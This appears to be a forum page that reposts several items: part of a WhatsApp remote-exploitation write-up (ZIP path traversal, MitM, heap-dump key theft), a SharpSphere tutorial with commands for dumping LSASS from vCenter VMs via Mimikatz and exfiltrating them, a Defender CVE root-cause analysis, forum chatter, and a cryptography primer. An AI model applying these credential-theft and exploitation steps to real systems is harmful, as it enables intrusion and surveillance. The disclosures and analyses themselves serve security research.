unsafeExtractManifestEntryZip(HttpResponseInterface response, String str) { FileOutputStream fileOutputStream; ... // (1) ZipInputStream zipInputStream = new ZipInputStream( new MessageInputStream(response.getInputStream(), this.A06, 0) ); ... byte[] bArr = new byte[8192]; while(true) { // (2) ZipEntry nextEntry = zipInputStream.getNextEntry(); ... // (3) fileOutputStream = new FileOutputStream( new File(idHashFileName.getAbsolutePath(), nextEntry.getName()) ); while(true) { int read = zipInputStream.read(bArr); if(read == -1) break; fileOutputStream.write(bArr, 0, read); } fileOutputStream.close(); } zipInputStream.close(); ... } Focusing only on the relevant parts, at (1) a ZipInputStream is instantiated. The input to the ZipInputStream comes from another type of input stream which, in turn, reads its input from the HTTP channel established to the aforementioned URL. As the ZIP bundle is downloaded, input flows to the ZipInputStream and ZIP entries are parsed one-by-one at (2). The most interesting stuff happens at (3), where a FileOutputStream is created to a destination file whose name is constructed by concatenating the return value of getAbsolutePath() of a directory with the string returned from the ZIP entry's getName(). As is already known, the name of an entry in a ZIP directory should not be trusted, as it might contain directory traversal sequences. It's exactly this "feature" that an attacker can exploit to overwrite arbitrary files owned by WhatsApp. The next question is what file can an attacker overwrite in order to eventually execute code with the privileges of the WhatsApp client. Unfortunately, WhatsApp for no apparent reason makes use of Facebook's superpack for distributing its native libraries. What happens is that all native DSOs are placed in a compressed archive, in a proprietary format, and then packed in the application's APK as a raw asset. When the application is executed, native libraries are extracted under data/ and SoLoader [31] is used to load them. Attackers are thus able to modify the extracted libraries and have the victim application load untrusted code. Here's where the extracted libraries can be found: # pwd /data/data/com.whatsapp/files/decompressed/libs.spk.zst # ls -la total 9042 drwx------ 2 u0_a168 u0_a168 3488 2021-02-10 17:30 . drwx------ 3 u0_a168 u0_a168 3488 2021-01-25 17:11 .. -rw------- 1 u0_a168 u0_a168 32 2021-02-10 17:30 .superpack_version -rw------- 1 u0_a168 u0_a168 1055016 2021-02-10 17:30 libc++_shared.so -rw------- 1 u0_a168 u0_a168 123744 2021-02-10 17:30 libcurve25519.so -rw------- 1 u0_a168 u0_a168 134056 2021-02-10 17:30 libfbjni.so -rw------- 1 u0_a168 u0_a168 47656 2021-02-10 17:30 libgifimage.so -rw------- 1 u0_a168 u0_a168 76296 2021-02-10 17:30 libminscompiler-jni.so -rw------- 1 u0_a168 u0_a168 200000 2021-02-10 17:30 libprofilo.so -rw------- 1 u0_a168 u0_a168 68368 2021-02-10 17:30 libprofilo_atrace.so -rw------- 1 u0_a168 u0_a168 23096 2021-02-10 17:30 libprofilo_build.so -rw------- 1 u0_a168 u0_a168 67688 2021-02-10 17:30 libprofilo_fb.so -rw------- 1 u0_a168 u0_a168 3720 2021-02-10 17:30 libprofilo_fmt.so -rw------- 1 u0_a168 u0_a168 23976 2021-02-10 17:30 libprofilo_linker.so -rw------- 1 u0_a168 u0_a168 68296 2021-02-10 17:30 libprofilo_mmapbuf.so -rw------- 1 u0_a168 u0_a168 48688 2021-02-10 17:30 libprofilo_plthooks.so -rw------- 1 u0_a168 u0_a168 9144 2021-02-10 17:30 libprofilo_sigmux.so -rw------- 1 u0_a168 u0_a168 134328 2021-02-10 17:30 libprofilo_stacktrace.so -rw------- 1 u0_a168 u0_a168 68432 2021-02-10 17:30 libprofilo_systemcounters.so -rw------- 1 u0_a168 u0_a168 68080 2021-02-10 17:30 libprofilo_threadmetadata.so -rw------- 1 u0_a168 u0_a168 83928 2021-02-10 17:30 libprofilo_util.so -rw------- 1 u0_a168 u0_a168 3240 2021-02-10 17:30 libprofiloextapi.so -rw------- 1 u0_a168 u0_a168 395992 2021-02-10 17:30 libstatic-webp.so -rw------- 1 u0_a168 u0_a168 5880 2021-02-10 17:30 libvlc.so -rw------- 1 u0_a168 u0_a168 6378408 2021-02-10 17:30 libwhatsapp.so -rw------- 1 u0_a168 u0_a168 119408 2021-02-10 17:30 libyoga.so The following video demonstrates the attack. A malicious libwhatsapp.so library is extracted over the legitimate one. WhatsApp exits and immediately attempts to restart. The malicious library is loaded and "pwnd!" is recorded to the system logs. Please note the following: The relevant material can be found in the PoC's tls12_psk_extract/ directory. Detailed instructions for setting up the MitM environment can be found in README.md in the same directory. To make testing and demonstration easier, instead of carrying out the information gathering phase again and again, we make use of ADB to pull the TLS session files directly from the victim device. These files correspond to the leaked .bin files shown in the previous video. The video shows the attacker preparing payload.zip, a ZIP file that holds the malicious libwhatsapp.so library. The name of the ZIP entry is modified to contain directory traversal sequences and the final archive is copied in tls12_psk_extract/ to be used by our MitM server scripts. Leaked TLS 1.2 sessions are actually DER-encoded structures. Recall that Android uses BoringSSL, while most Linux and Mac OS X PCs use OpenSSL instead. To make the leaked session recognizable by OpenSSL, one has to convert between the two DER formats. Script convert_session.sh, which, uses boringssl_session.cpp and openssl_session.c in the background, is used for this task. The resulting OpenSSL session file is stored in the current directory under session.der (DER format) and session.pem (PEM format). Session information is further displayed on the screen. The last command in the long listing is a wrapper shell script, namely run_server.sh, that executes an OpenSSL version specially modified to perform MitM attacks on WhatsApp's TLS 1.2. The patch for OpenSSL 1.1.1f can be found in openssl-1.1.1f-patches/tls12-mitm.patch. In the video one can see the victim attempting to send a picture to the attacker. WhatsApp attempts to download the photo filters from the URL mentioned above, but, instead, the modified s_server serves the malicious ZIP payload. Stealing the victim's Noise protocol key pair In this section we will see how the attained man-in-the-middle capability could also lead to the compromise of the confidentiality of user communications. The WhatsApp Security Whitepaper [23] explains that user communications are protected through end-to-end (E2E) encryption. The protocol used for E2E encryption is the Noise protocol [05]. WhatsApp comes with a debugging mechanism that allows its development team to catch fatal errors happening in the wild during the first few days of a release. More specifically, if an OutOfMemoryError exception is thrown, a custom exception handler is invoked that collects System Information, WhatsApp Application Logs, as well as a dump of the Application Heap (collected using android.os.Debug::dumpHprofData()). These are uploaded to crashlogs.whatsapp.net. This process is carried out if and only if less than 10 days have elapsed since the current version's release date. Needless to say, the heap content that is uploaded to the WhatsApp infrastructure holds sensitive user information. Using the strings tool against the dumped heap data, one can easily identify plaintext conversations, and more interestingly Noise protocol key pairs, encoded in base64 form. The relevant code can be found in class OOMHandler (X.0nS😞 public void uncaughtException(Thread thread, Throwable throwable) { ... // (1) if(C008703v.getNumberOfDaysSinceReleaseDate(r12.expirationChecker) > 10) { z5 = true; } if(z5) { Log.m19i("OOMHandler/hprof dump not allowed"); } else { ... // (2) Debug.dumpHprofData(String.format(Locale.US, "%s/dump.hprof", new Object[] { r12.hprofFilenameMatcher.context.getCacheDir().getPath() })); Log.m19i("OOMHandler/dump successful"); } ... } At (1), getNumberOfDaysSinceReleaseDate() is called, which performs the action its name indicates. If the return value is larger than 10, the heap contents are not dumped. However, in case less than 10 days have elapsed since the release date, heap content is written in dump.hprof and placed in the application's private cache directory. From an attacker's perspective, the above process is quite interesting, as all connections to the crash logs server, even though they are protected through TLS, can be intercepted after extracting the corresponding Master Secret from the victim's device. Interestingly, WhatsApp uses both TLS 1.2 as well as TLS 1.3 (WaTLS), during the information upload process; logs are uploaded using TLS 1.2, while heap contents using TLS 1.3 (WaTLS). With the corresponding Master Secret / PSK extracted from a victim's device, both connections can be intercepted and their contents can be read in plaintext. With this in mind, one might wonder how can an OutOfMemoryError exception be triggered remotely on the victim's device. While the author was preparing his debugging environment, he noticed that WhatsApp performs the following HTTP request quite often: https://static.whatsapp.net/sticker?cat=all&lg=en-US&country=GR&ver=2 Even though the exact mechanics leading to this action are not known to the author, a quick visit to the above location shows that this URL hosts a JSON file holding information on WhatsApp sticker packs. Turns out, a method, we have named openStickerConnection() (defined in class X.2kz), is responsible for connecting to this URL and downloading the response. Here's what it looks like: public final ETagAndStickerPacksBundle openStickerConnection(String url, String etag) { HttpsURLConnection httpsURLConnection; ... // (1) httpsURLConnection = new URL(url).openConnection(); httpsURLConnection.setSSLSocketFactory(this.A06.getMediaExternalSSLCacheEnabledSSLSocketFactory()); httpsURLConnection.setRequestProperty("User-Agent", this.A07.getUserAgent()); httpsURLConnection.setConnectTimeout(15000); httpsURLConnection.setReadTimeout(30000); httpsURLConnection.setRequestMethod("GET"); ... int responseCode = httpsURLConnection.getResponseCode(); if(responseCode == 200) { ... InputStream inputStream = httpsURLConnection.getInputStream(); // (2) String json = C27551It.readAllFromInputStream(inputStream); AssertUtil.assertNotNull(json); JSONArray jSONArray = new JSONArray(json); ... } ... } At (1) WhatsApp initiates an HTTP connection to the given URL. One thing to note here is that the connection's SSLSocketFactory is set to the return value of getMediaExternalSSLCacheEnabledSSLSocketFactory(). The latter returns an instance of the TLS 1.2 SSL factory that stores TLS sessions in the device's external storage and, thus, it is possible for an attacker to intercept this connection. Later on, at (2), one can see that once an input stream has been opened, WhatsApp uses readAllFromInputStream() of class X.1It to read the whole response in a single string buffer, no matter how large the latter is. For completeness, the code of readAllFromInputStream() is shown below: public static String readAllFromInputStream(InputStream inputStream) { char[] buf = new char[8192]; BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream)); StringWriter stringWriter = new StringWriter(); while(true) { int read = bufferedReader.read(buf); if(read < 0) { bufferedReader.close(); return stringWriter.toString(); } else if(!Thread.currentThread().isInterrupted()) { stringWriter.write(buf, 0, read); } else { throw new InterruptedIOException(); } } } Sending an arbitrarily large response to the client will eventually trigger an Out-Of-Memory (OOM) condition. Furthermore, to avoid sending large amounts of data, and trigger the OOM faster, an attacker can use GZip encoding. Once an OutOfMemoryError is thrown, WhatsApp's custom exception handler will be called to handle the situation. System information will be collected, and the upload process will be triggered. Intercepting the connection will disclose all the sensitive information that was intended to be sent to WhatsApp's internal infrastructure. The following image shows how a successful attack looks like: The screenshot above shows a tmux session. The window on the left shows the output of openssl_http_pipe.py (found under tls12_psk_extract/), a tool that forks a modified OpenSSL s_server instance and communicates with it over a pipe, in order to allow a user to handle HTTP requests manually. The lines at the very bottom, show the POST request that WhatsApp issues in order to upload the heap data. In our case, around 4Mb of data have been grabbed. The window on the right shows a brief overview of this data. It can be seen that it's actually a part of a multipart request, corresponding to a file named dump.gz. The latter's contents are not shown here in full, as they contain cryptographic material of an actual WhatsApp account. The tooling required for this attack can be found in the PoC's tls12_psk_extract/ directory. Detailed instructions for setting up the MitM environment can be found in README.md in the same directory. Conclusion and future work This blog post demonstrated the potential of exploiting man-in-the-disk (MitD) vulnerabilities using remote vectors. More specifically, TLS session secrets of WhatsApp were found to be stored erroneously in an unprotected directory. These were collected remotely through the exploitation of a vulnerability in an Android component (CVE-2020-6516, a Same-Origin-Policy bypass bug of Chrome). Of course, the collection of secrets could have also been achieved through the introduction of a malicious application on the victim's device. Once the TLS session secrets were collected it was possible to perform a man-in-the-middle attack to WhatsApp communications. The man-in-the-middle attack allowed the attacker to execute arbitrary code on the victim's device. Moreover, the man-in-the-middle attack allowed for the collection of the victim user's Noise protocol cryptographic material, which could later be used for the decryption of user communications. The introduction of Scoped Storage in Android greatly limits the impact of man-in-the-disk vulnerabilities. Android 11 is the first version of Android to fully enforce scoped storage, allowing apps to access by default only their own resources on external storage. CENSUS strongly recommends to users to make sure they are using WhatsApp version 2.21.4.18 or greater on the Android platform, as previous versions are vulnerable to the aforementioned bugs and may allow for remote user surveillance. CENSUS has tracked the TLS 1.2 man-in-the-disk vulnerability under CVE-2021-24027 [33]. There are many more subsystems in WhatsApp which might be of great interest to an attacker. The communication with upstream servers and the E2E encryption implementation are two notable ones. Additionally, despite the fact that this work focused on WhatsApp, other popular Android messaging applications (e.g. Viber, Facebook Messenger), or even mobile games might be unwillingly exposing a similar attack surface to remote adversaries. References [01] https://blog.checkpoint.com/2018/08/12/man-in-the-disk-a-new-attack-surface-for-android-apps/ [02] https://bugs.chromium.org/p/chromium/issues/detail?id=1092449 [03] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516 [04] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24027 [05] http://www.noiseprotocol.org/ [06] https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/ [07] https://www.washingtonpost.com/technology/2019/10/29/whatsapp-accuses-israeli-firm-helping-governments-hack-phones-journalists-human-rights-workers/ [08] https://github.com/skylot/jadx [09] https://developer.android.com/guide/topics/providers/content-providers [10] https://developer.android.com/guide/topics/manifest/provider-element [11] https://android.googlesource.com/platform/frameworks/base/+/962fb40991f15be4f688d960aa00073683ebdd20%5E%21/#F0 [12] https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy [13] https://developer.android.com/about/versions/10/privacy/changes#scoped-storage [14] https://chromium.googlesource.com/chromium/src/+/c6e232163d52e4334f7227ef30634b707e44a903%5E%21/#F4 [15] https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API [16] http://phrack.org/issues/69/13.html [17] https://tools.ietf.org/html/rfc8446 [18] https://developer.android.com/reference/javax/net/ssl/X509TrustManager [19] https://tools.ietf.org/html/rfc5077 [20] https://www.openssl.org/docs/man1.1.1/man3/SSL_set_psk_find_session_callback.html [21] https://tools.ietf.org/html/rfc5246 [22] https://tools.ietf.org/html/rfc7627 [23] https://www.whatsapp.com/security/WhatsApp-Security-Whitepaper.pdf [24] https://threatpost.com/researchers-find-ssl-problems-in-whatsapp/104411/ [25] http://aosp.opersys.com/xref/android-10.0.0_r47/xref/external/conscrypt/repackaged/common/src/main/java/com/android/org/conscrypt/FileClientSessionCache.java#44 [26] https://docs.oracle.com/javase/7/docs/api/javax/net/ssl/SSLSocket.html#startHandshake() [27] https://docs.oracle.com/javase/7/docs/api/javax/net/ssl/SSLSessionContext.html#getSession(byte[]) [28] https://developer.android.com/reference/android/net/SSLSessionCache [29] https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/ [30] https://blog.talosintelligence.com/2019/04/seaturtle.html [31] https://github.com/facebook/SoLoader [32] https://twitter.com/Shiftreduce/status/1347546599384346624/photo/1 [33] WhatsApp Exposure of TLS 1.2 Cryptographic Material to Third Party Apps (CVE-2021-24027) [34] WhatsApp for Android [35] https://www.appbrain.com/stats/top-android-sdk-versions [36] READ_EXTERNAL_STORAGE permission in Android apps [37] https://github.com/CENSUS/whatsapp-mitd-mitm Sursa: https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/
  4. Dumping LSASS with SharpShere The dump function of SharpSphere allows operators to dump LSASS from any powered on VM managed by vCenter or ESXI, without needing to authenticate to the guest OS and without needing VMware Tools to be installed. This technique is not new and has been around for many years: https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-6-vmware-workstation/ https://web.archive.org/web/20210204072538/https://www.remkoweijnen.nl/blog/2013/11/25/dumping-passwords-in-a-vmware-vmem-file/ Although until now it’s been very difficult to leverage operationally. At its core, the process is: Authenticate to vCenter/ESXi Create a snapshot, with memory, of a powered on target VM Download the (often very large) .vmem and .vmsn files from the datastore Either run it through Volatility Or convert to .dmp with vmss2core and run it through WinDbg with Mimikatz Arguments Z:\>SharpSphere.exe dump --help SharpSphere 1.0.0.0 Copyright © 2020 --url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk --username Required. vCenter username, i.e. administrator@vsphere.local --password Required. vCenter password --targetvm Required. VM to snapshot --snapshot (Default: false) WARNING: Creates and then deletes a snapshot. If unset, SharpSphere will only extract memory from last existing snapshot, or none if no snapshots are available. --destination Required. Full path to the local directory where the file should be downloaded --help Display this help screen. --version Display version information. –snapshot By default, SharpSphere will not attempt to create a snapshot and will instead attempt to find valid .vmem and .vmsn files from an existing snapshot. This is preferrable from an OpSec perspective because there will be no evidence in the UI, however it’s obviously not guaranteed that a particular target VM has any snapshots, or whether these snapshots also captured the VM’s memory. If no existing snapshot exists then SharpSphere will exit. With --snapshot specified, SharpSphere will create a snapshot called System Backup [TIMESTAMP], download its associated ‘.vmem and .vmsn files, and then delete the snapshot once finished. Both the creation and deletion of the snapshot will be seen by other users in the Recent Tasks Window. It’s possible to attempt it without the --snapshot first to see if existing snapshots exist, and then repeat with --snapshot specified if none exist. –destination SharpSphere needs to download two files from the snapshot, a large .vmem file that is equal in size to the amount of RAM assigned to the machine (i.e. 4GB, 8GB, 16GB etc.), and a much smaller .vmsn file. It downloads these files to the directory specified by --destination on the executing machine. When running through Cobalt Strike’s execute-assembly this is obviously a directory on the beacon machine’s filesystem. This is an important distinction to make because it’s likely your target user is on an internal network and therefore the download should be relatively quick, as opposed to having to download these files over your beacon’s proxy. Once the two files are downloaded, SharpSphere adds both to a zip file with a random name and then deletes them. This makes the resultant file marginally easier to exfiltrate, for example during testing a 4GB .vmem file resulted in a 800MB zip. Instructions Execute SharpSphere with the following arguments (Hint: get the VM name with list😞 SharpSphere.exe dump --url https://[IP or FQDN]/sdk --username [USERNAME] --password [PASSWORD] --targetvm [NAME OF VM] --destination [LOCATION TO DOWNLOAD FILES] Example Output C:\Users\Administrator\Desktop>SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface, takes a few minutes... [x] Connected to VMware vCenter Server 7.0.1 build-17005016 [x] Successfully authenticated [x] Finding existing snapshots for Windows 10... Error: No existing snapshots found for the VM Windows 10, recommend you try again with --snapshot set If no snapshots exist, repeat the same command and include --snapshot SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" --snapshot [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface, takes a few minutes... [x] Connected to VMware vCenter Server 7.0.1 build-17005016 [x] Successfully authenticated [x] Creating snapshot for VM Windows 10... [x] Snapshot created successfully [x] Downloading Windows 10-Snapshot51.vmem (4096MB) to C:\Users\Public\z53dqmxx.5bz... [x] Downloading Windows 10-Snapshot51.vmsn to C:\Users\Public\hwu5gv2d.ezv... [x] Download complete, zipping up so it's easier to exfiltrate... [x] Zipping complete, download C:\Users\Public\cec0kwgk.b2m (916MB), rename to .zip, and follow instructions to use with Mimikatz [x] Deleting the snapshot we created If your C2 infrastructure and bandwidth supports it, download the resultant zip to your attacker controlled machine. Alternatively, and less OpSec-safe, upload the necessary tools to the beacon machine, with the understanding that these tools may be flagged as suspicious. The rest of the instructions assumes you’ve managed to get the file back to your machine. Rename the random file, in this instance cec0kwgk.b2m, to be a zip file and then extract the two files. The larger one is your .vmem file. Download vmss2core and provide it first with the smaller .vmsn file and then the larger .vmem file. If the target VM is Microsoft Windows 8/8.1, Windows Server 2012, Windows Server 2016 or Windows Server 2019 then execute with -W8: vmss2core-sb-8456865.exe -W8 hwu5gv2d.ezv z53dqmxx.5bz Otherwise use -W: vmss2core-sb-8456865.exe -W hwu5gv2d.ezv z53dqmxx.5bz Download WinDbg and load the resultant .dmp file that vmss2core generated as a Crash Dump. Download Mimikatz and load Mimilib.dll from within WinDbg .load C:\Tools\Mimikatz\x64\mimilib.dll Find the LSASS process !process 0 0 lsass.exe Switch to that process .process /r /p ffffc70462d020c0 Profit !mimikatz Written on February 26, 2021 Sursa: https://jamescoote.co.uk/Dumping-LSASS-with-SharpShere/
  5. CVE-2021-1647: Windows Defender mpengine remote code execution Maddie Stone The Basics Disclosure or Patch Date: 12 January 2021 Product: Microsoft Windows Defender Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647 Affected Versions: Version 1.1.17600.5 and previous First Patched Version: Version 1.1.17700.4 Issue/Bug Report: N/A Patch CL: N/A Bug-Introducing CL: N/A Reporter(s): Anonymous The Code Proof-of-concept: Exploit sample: 6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788 Did you have access to the exploit sample when doing the analysis? Yes The Vulnerability Bug class: Heap buffer overflow Vulnerability details: There is a heap buffer overflow when Windows Defender (mpengine.dll) processes the section table when unpacking an ASProtect packed executable. Each section entry has two values: the virtual address and the size of the section. The code in CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects only checks if the next section entry's address is lower than the previous one, not if they are equal. This means that if you have a section table such as the one used in this exploit sample: [ (0,0), (0,0), (0x2000,0), (0x2000,0x3000) ], 0 bytes are allocated for the section at address 0x2000, but when it sees the next entry at 0x2000, it simply skips over it without exiting nor updating the size of the section. 0x3000 bytes will then be copied to that section during the decompression, leading to the heap buffer overflow. if ( next_sect_addr > sect_addr )// current va is greater than prev (not also eq) { sect_addr = next_sect_addr; sect_sz = (next_sect_sz + 0xFFF) & 0xFFFFF000; } // if next_sect_addr <= sect_addr we continue on to next entry in the table [...] new_sect_alloc = operator new[](sect_sz + sect_addr);// allocate new section [...] Patch analysis: There are quite a few changes to the function CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects between version 1.1.17600.5 (vulnerable) and 1.1.17700.4 (patched). The directly related change was to add an else branch to the comparison so that if any entry in the section array has an address less than or equal to the previous entry, the code will error out and exit rather than continuing to decompress. Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.): It seems possible that this vulnerability was found through fuzzing or manual code review. If the ASProtect unpacking code was included from an external library, that would have made the process of finding this vulnerability even more straightforward for both fuzzing & review. (Historical/present/future) context of bug: The Exploit (The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.) Exploit strategy (or strategies): The heap buffer overflow is used to overwrite the data in an object stored as the first field in the lfind_switch object which is allocated in the lfind_switch::switch_out function. The two fields that were overwritten in the object pointed to by the lfind_switch object are used as indices in lfind_switch::switch_in. Due to no bounds checking on these indices, another out-of-bounds write can occur. The out of bounds write in step 2 performs an or operation on the field in the VMM_context_t struct (the virtual memory manager within Windows Defender) that stores the length of a table that tracks the virtual mapped pages. This field usually equals the number of pages mapped * 2. By performing the 'or' operations, the value in the that field is increased (for example from 0x0000000C to 0x0003030c. When it's increased, it allows for an additional out-of-bounds read & write, used for modifying the memory management struct to allow for arbitrary r/w. Exploit flow: The exploit uses "primitive bootstrapping" to to use the original buffer overflow to cause two additional out-of-bounds writes to ultimately gain arbitrary read/write. Known cases of the same exploit flow: Unknown. Part of an exploit chain? Unknown. The Next Steps Variant analysis Areas/approach for variant analysis (and why): Review ASProtect unpacker for additional parsing bugs. Review and/or fuzz other unpacking code for parsing and memory issues. Found variants: N/A Structural improvements What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.? Ideas to kill the bug class: Building mpengine.dll with ASAN enabled should allow for this bug class to be caught. Open sourcing unpackers could allow more folks to find issues in this code, which could potentially detect issues like this more readily. Ideas to mitigate the exploit flow: Adding bounds checking to anywhere indices are used. For example, if there had been bounds checking when using indices in lfind_switch::switch_in, it would have prevented the 2nd out-of-bounds write which allowed this exploit to modify the VMM_context_t structure. Other potential improvements: It appears that by default the Windows Defender emulator runs outside of a sandbox. In 2018, there was this article that Windows Defender Antivirus can now run in a sandbox. The article states that when sandboxing is enabled, you will see a content process MsMpEngCp.exe running in addition to MsMpEng.exe. By default, on Windows 10 machines, I only see MsMpEng.exe running as SYSTEM. Sandboxing the anti-malware emulator by default, would make this vulnerability more difficult to exploit because a sandbox escape would then be required in addition to this vulnerability. 0-day detection methods What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day? Detecting these types of 0-days will be difficult due to the sample simply dropping a new file with the characteristics to trigger the vulnerability, such as a section table that includes the same virtual address twice. The exploit method also did not require anything that especially stands out. Other References February 2021: 浅析 CVE-2021-1647 的漏洞利用技巧("Analysis of CVE-2021-1647 vulnerability exploitation techniques") by Threatbook Sursa: https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1647.html
  6. Nu uitati, weekend, CTF, premii! https://ctf.rstforums.com/ Daca mai poate cineva contribui cu exercitii, nu foarte dificile, e perfect.
  7. Eu m-am programat la Romexpo cand mai erau 3000 pe lista de asteptare. Si cred ca dupa vreo 2 saptamani m-am putut programa.
  8. Nu ma pregatesc sa dau niciun ordin, minti lumea pe fata. Cat despre dat burta jos, tot incerc dar nu imi iese... Poate cei care dau ordinul imi dau si niste sfaturi ca sa scap de burta.
  9. Salut, SHA256/SHA512 etc nu se pot inversa pentru ca sunt algoritmi de hashing. De exemplu, un hash sha256 pentru textul "Gigel" va fi 38810d5f65b12d1433aaff068818bc1f298a322b2a45a8f335645c8fe3af3510 Un hash pentru "Gigel se duce la plimbare si vede o fata de care se indragosteste apoi uita de ea cand vede un Lamborghini si gaseste 10 RON pe jos" va avea urmatorul hash: 299c91444f0f7f8ee3cf12ffc4a9483bc1caf5f43f68b0593b1dddd84a0b44be Dupa cum vezi, indiferent de lungimea textului, lungimea hash-ului este aceeasi. Chiar daca textul (sau binarul) are 1KB sau 2 TB, un hash va avea aceeasi lungime si va fi mereu acelasi pentru acelasi input. De aceea sunt folosite pentru a nu stoca parolele in plain-text in baza de date. Ca sa luam un exemplu mai simplu: CNP. Acesta contine sexul, data nasterii, judetul ... iar ultima cifra este o "suma de control". Algoritmul exact este descris aici: https://ro.wikipedia.org/wiki/Cod_numeric_personal_(România) - asa se calculeaza acea ultima cifra. Dar sa luam un exemplu mai simplu, sa zicem ca pentru CNP 1881111111116 suma de control este cifra "6" de la final si ca se calculeaza doar adunand cifrele si scotand restul impartirii la 10 (%10 adica). Un hash, ca idee, e ceva asemanator. Un hash reprezinta de fapt acel "6" de la final. Poti din acel 6 sa deduci CNP-ul? E destul de clar ca nu. Singurul lucru care se poate face pe hash-uri e bruteforce, care poate fi optimizat din cauza unor "probleme" in algoritmul hash-urilor. Adica sa incerci a faci hash din orice combinatii de text: aaaaaa, aaaaab, aaaaac etc pana ajungi la hash-ul dorit. Discutia se poate prelungi.
  10. CRYPTOGRAPHY CHEAT SHEET FOR BEGINNERS 1 What is cryptography? Cryptography is a collection of techniques for: concealing data transmitted over insecure channels validating message integrity and authenticity 2 Some cryptographic terms plaintext – a message or other data in readable form ciphertext – a message concealed for transmission or storage encryption – transforming plaintext into ciphertext decryption – transforming ciphertext back into plaintext key – an input to an encryption or decryption algorithm that determines the specific transformation applied hash – the output of an algorithm that produces a fixed N-bit output from any input of any size entropy – the number of possible states of a system, or the number of bits in the shortest possible description of a quantity of data. This may be less than the size of the data if it is highly redundant. 3 Basic cryptographic algorithms 3.1 symmetric ciphers A symmetric cipher uses the same key for encryption and decryption. In semi-mathematical terms, encryption: ciphertext = E(plaintext, key) decryption: plaintext = D(ciphertext, key) Two parties that want to communicate via encryption must agree on a particular key to use, and sharing and protecting that key is often the most difficult part of protecting encryption security. The number of possible keys should be large enough that a third party can’t feasibly try all of the keys (“brute-forcing”) to see if one of them decrypts a message. 3.2 block ciphers A block cipher works on fixed-size units of plaintext to produce (usually) identically-sized units of ciphertext, or vice-versa. Example block ciphers: DES (the former Data Encryption Standard) with a 64-bit block and 56-bit keys, now obsolete because both the block size and key size are too small and allow for easy brute-forcing) AES (Advanced Encryption Standard, formerly known as Rijndael) with 128-bit blocks and keys of 128, 192, or 256 bits 3.3 stream ciphers A stream cipher produces a stream of random bits based on a key that can be combined (usually using XOR) with data for encryption or decryption. Example stream ciphers: Chacha20 RC4 (now considered too weak to use) 3.4 public-key (or asymmetric) ciphers A public-key cipher has two complementary keys K1 and K2 such that one can reverse what the other one does, or in symbolic terms: ciphertext = E(plaintext, K1) or E(plaintext, K2) plaintext = D(ciphertext, K2) or D(plaintext, K1) Unlike a symmetric cipher, where the key must be kept secret between parties at all times, a public-key algorithm allows one (but only one!) of the keys to be revealed in public, making it possible to send encrypted messages without having previously arranged to share a key. Example public-key algorithms: RSA (from the initials of its creators Rivest, Shamir, Adelman) based on modular arithmetic using large prime numbers and the difficulty of factoring large numbers. At this time 2048-bit primes are considered necessary to create secure RSA keys (factorization of keys based on 512-bit primes has already been demonstrated and 1024-bit keys appear feasible) Elliptic Curve algorithms based on integers and modular arithmetic satisfying an equation of the form y^2 = x^3 + a*x + b. Elliptic curve keys can be much shorter (256-bit EC keys are considered roughly equivalent to 3072-bit RSA keys). However, public-key algorithms are much (hundreds to thousands) of times slower than symmetric algorithms, making it expensive to send large amounts of data using only public-key encryption. However, public-key algorithms do provide a secure way to transmit symmetric cipher keys. 3.5 Diffie-Hellman key exchange An algorithm that allows two parties to create a shared secret through a public exchange from which an eavesdropper cannot feasibly infer the secret. Useful for establishing a shared symmetric key for encrypted communication. Diffie-Hellman can be peformed using either modular arithmetic with large prime numbers or with elliptic-curve fields. Diffie-Hellman is also usually the basis of “forward secrecy”. One method of key exchange possible in SSL/TLS is simply using a public-key algorithm to send a key between a client and a server. However, if the private key of that SSL/TLS certificate is later exposed, someone who monitored and recorded session traffic could decrypt all the keys used in the sessions they recorded. Forward secrecy not only involves setting up unique, random session keys for each communication session, but also using an algorithm like Diffie-Hellman which establishes those keys in a way that is inaccessible to an eavesdropper. 3.6 hash algorithms A hash (or cryptographic checksum) reduces input data (of any size) to a fixed-size N-bit value. In particular for cryptographic use a hash has these properties: two different inputs are very unlikely to produce the same hash (“collision”). it should be very difficult to find another input that produces any specified hash value (“preimage”) even a one-bit change in the input should produce a hash that is different in about N/2 bits Note that because the possible number of inputs to a hash function is much larger than the hash function output, there is always some small probability of collision or of finding a preimage. In the ideal case an N-bit hash has a 2^-(N/2) probability of collision for two randomly-chosen large inputs (look up the “birthday problem” for why it is N/2 and not N), and a 2^-N probability of a random input producing a specified hash value. Example hash algorithms: MD5 produces a 128-bit hash from its input. It has demonstrated collisions and feasible preimage computation and should not be used. SHA1 produces 160-bit hashes but has at least one demonstrated collision and is also deprecated for cryptographic use (however, it is still used in git because it is still workable as a hash function). SHA-256 produces 256-bit hashes. SHA-224 is basically a SHA-256 hash truncated to 224 bits. Similarly, SHA-512 produces a 512-bit hash and SHA-384 truncates a SHA-512 hash to 384 bits. 